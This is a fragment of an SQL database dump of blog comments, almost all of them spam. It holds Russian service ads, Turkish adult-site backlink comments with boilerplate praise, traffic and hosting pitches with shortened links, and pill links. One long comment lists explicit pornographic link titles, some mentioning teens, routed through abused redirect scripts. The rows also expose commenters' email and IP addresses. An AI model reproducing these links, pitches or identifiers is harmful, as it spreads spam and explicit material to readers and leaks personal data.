ротатора',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36','review',0,0),(104,1106,'ClimatDug','elenatoivanen100@gmail.com','','178.71.243.76','2020-08-02 15:44:17','2020-08-02 15:44:17','Друзья, здравствуйте! \r\n \r\nМонтаж, установка и обслуживание климатической техники. Интернет магазин кондиционеров, заказать установку кондиционера на выгодных условиях можно у нас. Поможем выбрать кондиционер \r\n \r\nклиматическая техника',0,'0','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','review',0,0),(114,4674,'Selena Weiser','selena.weiser@gmail.com','','193.8.127.98','2020-09-07 00:18:01','2020-09-07 00:18:01','YOU NEED QUALITY VISITORS for your: tummyrevolution.com\r\n \r\nMy name is Selena Weiser, and I\'m a Web Traffic Specialist. I can get:\r\n - visitors from search engines\r\n - visitors from social media\r\n - visitors from any country you want\r\n - very low bounce rate & long visit duration\r\n \r\nCLAIM YOUR 24 HOURS FREE TEST => https://bit.ly/3h750yC',0,'0','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','comment',0,0),(119,1106,'sazhencevreada','potapin193@gmail.com','','217.107.199.104','2020-09-08 17:28:14','2020-09-08 17:28:14','Питомник саженцев был основан в 2002 году \r\nНаши постоянные покупатели решают с помощью наших саженцев абсолютно разные задачи – обильный и вкусный урожай, экологичность собранных плодов, озеленение участка, создание уникального ландшафта, да просто отдых от времяпрепровождения по уходу за садом. Приходите в питомник саженцев со своими целями, а мы поможем вам в их осуществлении. \r\n \r\n \r\nКачественный посадочный материал по невысокой цене, доставкой и посадкой по Москве и Московской области',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36','review',0,0),(129,1106,'Krutiwebreada','potapin193@gmail.com','','217.107.199.104','2020-09-12 23:52:55','2020-09-12 23:52:55','Многофункциональный блог независимых энтузиастов. \r\nПолезные советы, лучшие хитрости быта, интересные самоделки и многое другое. \r\nПредлагаем вам облегчить свою жизнь, воспользовавшись полезными советами на все случаи жизни! \r\n \r\n \r\nКак избавиться от неприятного запаха обуви',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36','review',0,0),(131,1106,'Krutireada','potapin193@gmail.com','','217.107.199.104','2020-09-13 13:33:47','2020-09-13 13:33:47','Krutim-магазин и качественные услуги по цене ниже биржи фриланс услуг. \r\nСотни услуг, скорость и качество исполнения, отличный результат, низкие цены, возможность хорошего заработка,партнерская программа. \r\n \r\n \r\n200 ссылок на Яндекс Коллекции+БОНУС',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36','review',0,0),(193,1106,'Forelreada','potapin193@gmail.com','','217.107.199.102','2020-10-02 22:47:36','2020-10-02 22:47:36','Форель Радужная свежевыловленная охлажденная Мурманская. У неё нежное розовое мясо оно обладает приятными вкусовыми качествами и оказывает благотворное действие на наш организм. Форель радужная входит в диетические продукты. Купить форель радужную. \r\n \r\n \r\nКупить форель радужную',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 OPR/54.0.2952.64','review',0,0),(206,4659,'Maxine','anderson_lodewyckx@gmx.net','https://pesnitext.ru/maccullone/','109.248.54.80','2020-10-07 21:10:11','2020-10-07 21:10:11','Добавлю, мне не обидно, я взрослый человек.\r\nХотелось бы получить инструкцию, что \r\nделать.',0,'0','Mozilla/5.0 (X11; Linux x86_64; rv:56.0) Gecko/20100101 Firefox/56.0.4 Waterfox/56.0.4','comment',0,0),(252,1106,'zamokreada','potapin193@gmail.com','','217.107.199.102','2020-10-19 22:44:14','2020-10-19 22:44:14','Мы открываем двери автомобилей, хорошо обученные специалисты будут рады помочь вам. Вскрытие сейфов в Москве. Звоните нам в трудную минуту, мы готовы, чтобы протянуть вам руку помощи в любой момент. Аварийное вскрытие любых типов замков и дверей, низкие цены. Наша служба выполняет срочное вскрытие замков и дверей без повреждений, когда заклинило двери. Установка дверных замков Москва и Московская область. Наши хорошо обученные специалисты будут рады помочь вам 24 часа в сутки, семь дней в неделю, а также доступны в выходные и, самое главное, в праздничные дни. Конфиденциальность при оказании услуг. Доступные цены. \r\n \r\n \r\nВскрытие сейфов в Москве',0,'0','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36','review',0,0),(277,1106,'hamonDug','elenatoivanen100@gmail.com','','91.122.128.101','2020-10-22 16:59:59','2020-10-22 16:59:59','интернет-магазин испанских деликатесов с доставкой в Россию: испанский хамон, испанское вино, испанские оливки, оливковое масло, испанские колбасы, испанские сыры. \r\nхамон \r\n \r\n \r\nкупить хамон в волгограде',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36','review',0,0),(333,2132,'ShobekepNeelp','ShobekepNeelp@gmail.com','','46.17.106.61','2020-11-05 18:17:27','2020-11-05 18:17:27','20894 evil angel lola foxx okey babes niche sex http://tharpbackup.com/__media__/js/netsoltrademark.php?d=michelejullian.info/amateur/13435-amateur-little-caprice-teen.php \r\n36 brunette amber gets to lick an ass suzi http://zentase.net/__media__/js/netsoltrademark.php?d=michelejullian.info/pussy/6042-elle-alexandra-is-unable-to-resist-malena-morgan-and-soon-the-two.php \r\n18856 strategy monster pussy lips black sexy por http://lfapoint.org/__media__/js/netsoltrademark.php?d=michelejullian.info/teen/7018-elsa-jean-teenie-creampie-thief-sexy-now-nude-teens.php \r\n24598 suburbanamateurs amateur sexy samantha spreads her legs and plays http://fwjonesandson.com/__media__/js/netsoltrademark.php?d=michelejullian.info/amateur/17477-mikes-files-the-original-home-of-canadian-amateur.php \r\n10023 amateur mature couple loving to take http://famoussoftware.hostpapa.mobi/analytics/hit.php?nocache=1457728912.641&r=cutepix.info%2fsex%2friley-reyes.php&a=12&i=189802&r2=https%3a%2f%2fmichelejullian.info%2fbrunette%2f3828-metart-hine-serena-wood.php \r\n19491 riley reid fucks her pussy with big dildo http://pcmrsetups.ctcin.bio/out/?id=3729&link=https%3a%2f%2fmichelejullian.info%2fcock%2f14452-oiled-bikini-clad-jynx-maze-riding-hard-cock-with-hardcore.php \r\n471 anilos sharon pink blonde teen picgallery http://hamptonslawyer.com/__media__/js/netsoltrademark.php?d=michelejullian.info/love/9061-capri-cavanni-beauty-girl.php \r\n23043 sexy pattycake hot big boob blonde teen http://drsuhaspatil.org/__media__/js/netsoltrademark.php?d=michelejullian.info/cock/19110-teens-sneak-in-to-cock.php \r\n948 mya bailey juliette lesbian threesome frizzy for prettymya http://hbosupplies.com/__media__/js/netsoltrademark.php?d=michelejullian.info/teen/18853-kori-schoolgirl-teen.php \r\n20397 teen girls with chin length hair part por http://higherpurpose.net/__media__/js/netsoltrademark.php?d=michelejullian.info/hairy/1716-amateur-let-go-to-the-beach-and-show-off-our-pussies.php \r\n20406 old farts young tarts construction worker fucking teen http://calculationpartner.com/__media__/js/netsoltrademark.php?d=michelejullian.info/stockings/2735-amia-miley-in-sexy-black-fishnet-body-stocking.php \r\n13499 forumophilia having anal sex with the teen http://firesteed.net/__media__/js/netsoltrademark.php?d=michelejullian.info/brunette/13566-old-fella-eric-got-lucky-with-smoking-hot-teenage-brunette.php \r\n20533 bambi joli lesbian mistress nancy nubilefilms http://ww41.celtiaproductions.co.uk/__media__/js/netsoltrademark.php?d=michelejullian.info/nude/2866-sugiuranorio-bondage-box-japanese-kinbakusajiki.php \r\n8182 zazie skymm fun games http://youryieldsolution.com/__media__/js/netsoltrademark.php?d=michelejullian.info/blonde/22065-stoya-having-hot-sex-with-two-horny-guys-my-pornstar-book.php \r\n8128 neighbor affair elsa jean http://jockeybras.org/__media__/js/netsoltrademark.php?d=michelejullian.info/milf/7244-hot-stepmom-has-some-lesbian-fun-with-her-daughter.php \r\n5363 redhead amateur diana gold parts her tight pussy after undressing https://jump2.bdimg.com/mo/q/checkurl?url=michelejullian.info%2fcock%2f11663-pretty-blonde-blanche-bradburry-gets-her-tight-asshole-fucke.php \r\n16561 libby smith ass buttocks panties stockings female legs http://aksteelonline.org/__media__/js/netsoltrademark.php?d=michelejullian.info/teen/12235-cute-redhead-teen-lili-fox-gets-her-tight.php \r\n1187 soaked and fucked anal passport teen sex http://drmforce.net/__media__/js/netsoltrademark.php?d=michelejullian.info/pussy/6714-adorable-kami-kari-gets-her-ass-oiled-and-pussy-banged.php \r\n19583 very hairy really young pussy hot models naked http://pinna772.com/__media__/js/netsoltrademark.php?d=michelejullian.info/sexy/20773-jayme-langford-flaming-hot-at-babes.php \r\n4242 kali roses smoke em out http://huntington-law.com/__media__/js/netsoltrademark.php?d=michelejullian.info/ass/2026-teen-missionary-massage.php \r\n20237 amateur sexy girls gang bang http://www.stateunclaimedproperty.org/__media__/js/netsoltrademark.php?d=michelejullian.info/brunette/3439-teasing-brunette-with-big-boobs-dillion-harper-gets-dick-to-ride.php \r\n629 voyeur kasia polish beauty teen girl model mix http://jonasking.info/__media__/js/netsoltrademark.php?d=michelejullian.info/amateur/14190-depraved-stranger-amateur-homemade.php \r\n3739 brandi edwards threesome with adrianna nicole and has anal http://futuremath.org/__media__/js/netsoltrademark.php?d=michelejullian.info/hardcore/19588-sexy-anal-virgin-gets-fucked-hard-on-gotporn.php \r\n21191 teen cutie goes pussy to mouth for cumshot from her stepbrother http://www.historicdancetheatre.org/__media__/js/netsoltrademark.php?d=michelejullian.info/cock/24606-skinny-russian-teen-zoe-takes-his-cock-in-her-ass.php \r\n24597 anny aurora and caprice http://www.caldas.com/__media__/js/netsoltrademark.php?d=michelejullian.info/nude/7925-arielle-lupinkova-ariel-piper-fawn.php \r\n20233 christy exposes big mature tits http://m.beautifulbamboo.com/analytics/hit.php?nocache=1491100798.594&r=cutepix.info/sex/riley-reyes.php&a=12&i=2271029&r2=https://michelejullian.info/amateur/6678-grace-moon-first-anal-quest.php \r\n4190 nubiles horny grace hartley busy fingering pink nubile pussy http://mbaexperiencial.com/__media__/js/netsoltrademark.php?d=michelejullian.info/brunette/21570-gorgeous-brunette-in-sheer-panties-spreading-her-hairy-pussy-lips-wide.php \r\n12095 teen with perfect tits masturbates her ass cute eileen pho http://www.cmsmallengines.net/__media__/js/netsoltrademark.php?d=michelejullian.info/cock/18532-two-sweet-teen-babes-one-hard-dick-in-messy-suckin.php \r\n14266 amateur shower amp bathroom dusche und bad http://456.tc/__media__/js/netsoltrademark.php?d=michelejullian.info/cock/8996-newcommer-lily-rader-playing-with-her-hitachi.php \r\n21609 jeff milton russia http://yardhouseorderonline.com/__media__/js/netsoltrademark.php?d=michelejullian.info/model/16109-lukki-lima-in-presenting-by-albert-varin.php',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36','comment',0,0),(363,4652,'Yankee Candle Locations','elbertcopley@googlemail.com','https://nearum.com/stores/yankee-candle-locations','116.105.200.168','2020-11-08 07:25:15','2020-11-08 07:25:15','What a post! That is so chock full of useful information I can not wait to dig deep and get started using the resources you have \r\ngiven me. \r\nBest regards,\r\nLunding Hessellund',0,'0','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36','comment',0,0),(388,825,'ztdpudsogp','5ab97af60612864d1cb55808d8007de1prx@ssemarketing.net','http://ydflcqcutn','185.220.101.206','2020-11-10 22:06:06','2020-11-10 22:06:06','Muchas gracias. ?Como puedo iniciar sesion?',0,'0','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36','comment',0,0),(398,5410,'erotik izle','rens33@yandex.com','https://filmkovasi.org/','51.158.153.223','2020-11-12 12:19:33','2020-11-12 12:19:33','If you want to use the photo it would also be good to check with the artist beforehand in case it is subject to copyright. Best wishes. Aaren Reggis Sela',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4251.0 Safari/537.36','comment',0,0),(401,722,'lwedjcsbig','62aaac3bf546f9480e7d55c3d7a33593prx@ssemarketing.net','http://wurlaniisg','51.210.242.212','2020-11-12 16:46:39','2020-11-12 16:46:39','Muchas gracias. ?Como puedo iniciar sesion?',0,'0','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36','comment',0,0),(402,5410,'porno','rens33@yandex.com','https://filmkovasi.org/','51.15.174.151','2020-11-12 17:21:23','2020-11-12 17:21:23','If you want to use the photo it would also be good to check with the artist beforehand in case it is subject to copyright. Best wishes. Aaren Reggis Sela',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4251.0 Safari/537.36','comment',0,0),(407,5410,'sikis izle','pauldirschell@yahoo.com','https://filmkovasi.org/','51.158.153.222','2020-11-12 21:43:46','2020-11-12 21:43:46','We provide personalized essay creating solutions and you will count on outstanding papers only shipped in a very well timed method. Ines Isador Metcalf',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4251.0 Safari/537.36','comment',0,0),(417,5410,'sikis izle','rubby538@yahoo.com','https://filmkovasi.org/','51.15.11.30','2020-11-13 15:57:44','2020-11-13 15:57:44','A round of applause for your article post. Thanks Again. Much obliged. Daisy Alfons Hamfurd',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4251.0 Safari/537.36','comment',0,0),(420,5410,'sikis izle','rens33@yandex.com','https://filmkovasi.org/','51.158.154.101','2020-11-14 02:09:53','2020-11-14 02:09:53','If you want to use the photo it would also be good to check with the artist beforehand in case it is subject to copyright. Best wishes. Aaren Reggis Sela',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4251.0 Safari/537.36','comment',0,0),(422,5410,'erotik','ozariah@comcast.net','https://filmkovasi.org/','163.172.82.226','2020-11-14 11:23:11','2020-11-14 11:23:11','These are generally probably the most awesome and fashion chanel bags I ave actually had. And really fashionable. Worth every single cent. Almira Matthias Seavir',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4251.0 Safari/537.36','comment',0,0),(423,5410,'erotik','rens33@yandex.com','https://filmkovasi.org/','51.158.153.223','2020-11-14 13:46:08','2020-11-14 13:46:08','If you want to use the photo it would also be good to check with the artist beforehand in case it is subject to copyright. Best wishes. Aaren Reggis Sela',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4251.0 Safari/537.36','comment',0,0),(435,5410,'erotik izle','neuraldude@yahoo.com','https://filmkovasi.org/','45.9.122.201','2020-11-15 16:49:13','2020-11-15 16:49:13','Hi there, constantly i used to check web site posts here early in the break of day, because i enjoy to gain knowledge of more and more. Annemarie Tiler Antoni',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(440,5410,'erotik','moenoch@earthlink.net','https://filmkovasi.org/','193.39.245.196','2020-11-15 22:33:36','2020-11-15 22:33:36','I think this is a real great blog post. Thanks Again. Nevsa Renaud Haden',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(458,5410,'erotik','runner_isa@gmail.com','https://filmkovasi.org/','45.8.134.214','2020-11-17 15:50:54','2020-11-17 15:50:54','Birthday gift for my wife. She was over joyed with the watch. It looks beautiful on her wrist. Vivie Caleb Dyan',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(461,5410,'sikis izle','nicolejohnson6689@yahoo.com','https://filmkovasi.org/','138.128.59.139','2020-11-17 21:19:02','2020-11-17 21:19:02','I believe you have mentioned some very interesting details, regards for the post. Edie Sasha Arlina',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(533,5410,'erotik izle','okcstephens@yahoo.com','https://filmkovasi.org/','45.147.28.117','2020-11-19 07:09:42','2020-11-19 07:09:42','Perfectly indited articles, Really enjoyed studying. Ora Jamaal Bainbrudge',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(685,5410,'film','nettiegat@yahoo.com','https://filmakinesi.com/','193.27.21.190','2020-11-23 10:12:33','2020-11-23 10:12:33','Payday lenders are actually condemned as ruthless predators whose greed drives hapless borrowers into financial ruin. Nadean Ilaire Florie',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(686,1106,'pozamkamDug','elenatoivanen100@gmail.com','','178.71.7.139','2020-11-24 07:28:27','2020-11-24 07:28:27','Когда обычный человек сталкивается с тем что потерял ключи или замок был случайно или умышленно выведен из строя мы готовы прийти на помощь и вскрыть ваш замок. Вскрытие замков может происходить как с помощью слесарного инструмента, так и профессиональных отмычек - это зависит от типа замка, его модели и каждый наш мастер знает как работать с тем или иным видом замка. Все что вам нужно сделать - это оформить вызов и подождать некоторое время прибытия мастера по замкам. Мастер поедет к вам обязательно, в каждом районе Москвы работает по несколько мастеров по вскрытию замков от нашей компании. После вскрытия замка мы поможем вам в закупке комплектующих и установке нового более надежного замка для вашей двери. \r\n \r\nвскрытие замков дверей электронных',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36/iYA9HebN-7','review',0,0),(719,5410,'film','sabeena4@gmail.com','https://filmakinesi.com/','45.154.84.125','2020-11-25 05:53:22','2020-11-25 05:53:22','Hi, its good post concerning media print, we all understand media is a wonderful source of information. Hedy Arnold Joanne',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(745,5410,'film','palestra@usa.net','https://filmakinesi.com/','104.227.13.24','2020-11-26 00:26:37','2020-11-26 00:26:37','This is my first time pay a visit att here and i am actually pleassant to read everthing at one place. Gertrude Glenden Schwinn',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(799,5410,'film','mscooter99@yandex.com','https://filmakinesi.com/','209.127.143.238','2020-11-27 15:15:39','2020-11-27 15:15:39','Helpful info. Fortunate me I found your web site accidentally, and I am surprised why this coincidence did not took place earlier! I bookmarked it. Rena Gregorius Lenka',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(843,5410,'film','princessk11588@yahoo.com','https://filmakinesi.com/','104.144.34.108','2020-11-28 16:28:17','2020-11-28 16:28:17','If some one needs expert view concerning running a blog after that i propose him/her to visit this weblog, Keep up the good job. Gertrud Linn Borszcz',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(861,4674,'Davida Cabrera','davida.cabrera@gmail.com','','45.86.15.167','2020-11-29 14:15:30','2020-11-29 14:15:30','YOU NEED QUALITY VISITORS FOR YOUR: tummyrevolution.com\r\n \r\nWE PROVIDE ORGANIC VISITORS BY KEYWORD FROM SEARCH ENGINES OR SOCIAL MEDIA\r\n \r\nYOU GET HIGH-QUALITY VISITORS\r\n - visitors from search engines\r\n - visitors from social media\r\n - visitors from any country you want\r\n \r\nCLAIM YOUR 24 HOURS FREE TEST => https://bit.ly/3mcgwMq',0,'0','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','comment',0,0),(952,5410,'film','pampeterpan04@yandex.com','https://filmakinesi.com/','45.57.255.105','2020-12-02 17:27:22','2020-12-02 17:27:22','Great post! We will be linking to this particularly great article on our site. Keep up the good writing. Phyllida Waylen Zobkiw',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(980,4674,'Warren Lapsley','warren.lapsley68@gmail.com','','45.86.15.79','2020-12-03 23:40:15','2020-12-03 23:40:15','YOU NEED QUALITY VISITORS FOR YOUR: tummyrevolution.com\r\n \r\nWE PROVIDE ORGANIC VISITORS BY KEYWORD FROM SEARCH ENGINES OR SOCIAL MEDIA\r\n \r\nYOU GET HIGH-QUALITY VISITORS\r\n - visitors from search engines\r\n - visitors from social media\r\n - visitors from any country you want\r\n \r\nCLAIM YOUR 24 HOURS FREE TEST => https://bit.ly/3mcgwMq',0,'0','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','comment',0,0),(1097,5410,'erotik','momsvega02@gmail.com','https://filmkovasi.org/','45.94.47.151','2020-12-09 02:09:28','2020-12-09 02:09:28','Hi! Someone in my Myspace group shared this site with us so I came to look it over. Ree Woodman Clarabelle',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1099,4674,'Marvin Griffin','marvin.griffin@yahoo.com','','185.95.157.95','2020-12-09 05:08:23','2020-12-09 05:08:23','YOU’RE CRAVING MORE MONEY, MORE TIME, AND MUCH LESS STRESS.\r\n\r\nMy approach solves your issues and equips you with tried and tested techniques that help you reach your business goals.\r\nCheck it out… https://zeep.ly/ByLer',0,'0','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','comment',0,0),(1103,5410,'porno','skwightman@excite.com','https://filmkovasi.org/','45.137.40.232','2020-12-09 08:32:44','2020-12-09 08:32:44','I saw a lot of website but I believe this one contains something extra in it. Anitra Chan Arella',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1105,5410,'erotik film izle','nlpsr@prodigy.net','https://filmkovasi.org/','45.137.43.241','2020-12-09 11:00:03','2020-12-09 11:00:03','You made a few good points there. I did a search on the matter and found nearly all people will consent with your blog. Adriaens Andras Hortense',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1109,5410,'erotik izle','richard82@sympatico.ca','https://filmkovasi.org/','193.8.231.196','2020-12-09 14:01:40','2020-12-09 14:01:40','I think this is a real great blog article. Thanks Again. Great. Brynna Towney Durham',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1112,5410,'porno','netrelstreeter@yahoo.com','https://filmkovasi.org/','2.59.21.136','2020-12-09 17:27:41','2020-12-09 17:27:41','I think I am missing some bets on the river as well. Marsha Eugene Dene',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1115,5410,'erotik','samsjazz@yahoo.com','https://filmkovasi.org/','45.152.202.228','2020-12-09 20:41:04','2020-12-09 20:41:04','Thanks for sharing, this is a fantastic post. Much thanks again. Really Great. Dacey Ramsay Netta',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1128,4674,'Armando Thiel','thiel.armando@gmail.com','','45.152.208.230','2020-12-10 14:39:56','2020-12-10 14:39:56','YOU’RE CRAVING MORE MONEY, MORE TIME, AND MUCH LESS STRESS.\r\n\r\nMy approach solves your issues and equips you with tried and tested techniques that help you reach your business goals.\r\nCheck it out… https://zeep.ly/ByLer',0,'0','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','comment',0,0),(1131,5060,'film modu','sherry_lopez2@yahoo.com','https://www.filmmodu.org/','185.205.194.94','2020-12-10 16:39:37','2020-12-10 16:39:37','Way cool! Some very valid points! I appreciate you writing this article and the rest of the site is also very good. Theresa Jerrold Cami',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1152,2132,'Merziuz','merz27dqs3xf@hotmail.com','http://pills2sale.com/fTr1bYnau88IsQx','5.188.211.21','2020-12-12 05:43:38','2020-12-12 05:43:38','9CPTxE http://pills2sale.com/fTr1bYnau88IsQx',0,'0','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','comment',0,0),(1156,4674,'Merziuz','merz27dqs3xf@hotmail.com','http://pills2sale.com/fTr1bYnau88IsQx','5.188.211.13','2020-12-12 07:01:56','2020-12-12 07:01:56','Mkb9L5 http://pills2sale.com/fTr1bYnau88IsQx',0,'0','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','comment',0,0),(1159,4713,'Merziuz','merz27dqs3xf@hotmail.com','http://pills2sale.com/fTr1bYnau88IsQx','5.188.211.26','2020-12-12 08:26:51','2020-12-12 08:26:51','dNxFpB http://pills2sale.com/fTr1bYnau88IsQx',0,'0','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','comment',0,0),(1167,4674,'johnan','smithio34ga2534@yahoo.com','http://xnxx.in.net/','5.188.211.13','2020-12-12 20:14:24','2020-12-12 20:14:24','CNlfBe http://xnxx.in.net/ xnxx videos',0,'0','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','comment',0,0),(1172,2132,'johnan','smithio34ga2534@yahoo.com','http://xnxx.in.net/','5.188.211.13','2020-12-12 22:34:51','2020-12-12 22:34:51','clPhup http://xnxx.in.net/ xnxx videos',0,'0','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','comment',0,0),(1173,4713,'johnan','smithio34ga2534@yahoo.com','http://xnxx.in.net/','5.188.211.13','2020-12-12 23:29:29','2020-12-12 23:29:29','JNzZrS http://xnxx.in.net/ xnxx videos',0,'0','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','comment',0,0),(1180,4674,'dobson','smithio34ga2534@yahoo.com','https://writemyessayforme.web.fc2.com/','5.188.211.13','2020-12-13 05:39:16','2020-12-13 05:39:16','W4JUIO https://writemyessayforme.web.fc2.com/',0,'0','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','comment',0,0),(1181,4713,'dobson','smithio34ga2534@yahoo.com','https://writemyessayforme.web.fc2.com/','5.188.211.13','2020-12-13 05:59:12','2020-12-13 05:59:12','g0ML7w https://writemyessayforme.web.fc2.com/',0,'0','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','comment',0,0),(1182,2132,'dobson','smithio34ga2534@yahoo.com','https://writemyessayforme.web.fc2.com/','5.188.211.13','2020-12-13 06:00:52','2020-12-13 06:00:52','K1h9U0 https://writemyessayforme.web.fc2.com/',0,'0','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','comment',0,0),(1204,4674,'Bart Lebron','lebron.bart@gmail.com','','185.95.157.63','2020-12-13 22:14:11','2020-12-13 22:14:11','NOT SATISFIED WITH YOUR HOSTING ?\r\n\r\nCheck Out Our Coupons for This Month & Get Your Domain, Hosting and SSLs For Less! \r\nNamecheap Offers Amazing Deals That Save You Money Across Our Product Range! \r\nBest Value Web Products. 20 Years Serving You. Free WhoisGuard. #1 for Value Vs. Others.\r\n\r\nCheck Out Our Coupons for This Month => https://zeep.ly/5uSUK',0,'0','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','comment',0,0),(1221,4674,'Theron Propst','propst.theron@hotmail.com','','45.130.255.92','2020-12-14 18:47:41','2020-12-14 18:47:41','NOT SATISFIED WITH YOUR HOSTING ?\r\n\r\nCheck Out Our Coupons for This Month & Get Your Domain, Hosting and SSLs For Less! \r\nNamecheap Offers Amazing Deals That Save You Money Across Our Product Range! \r\nBest Value Web Products. 20 Years Serving You. Free WhoisGuard. #1 for Value 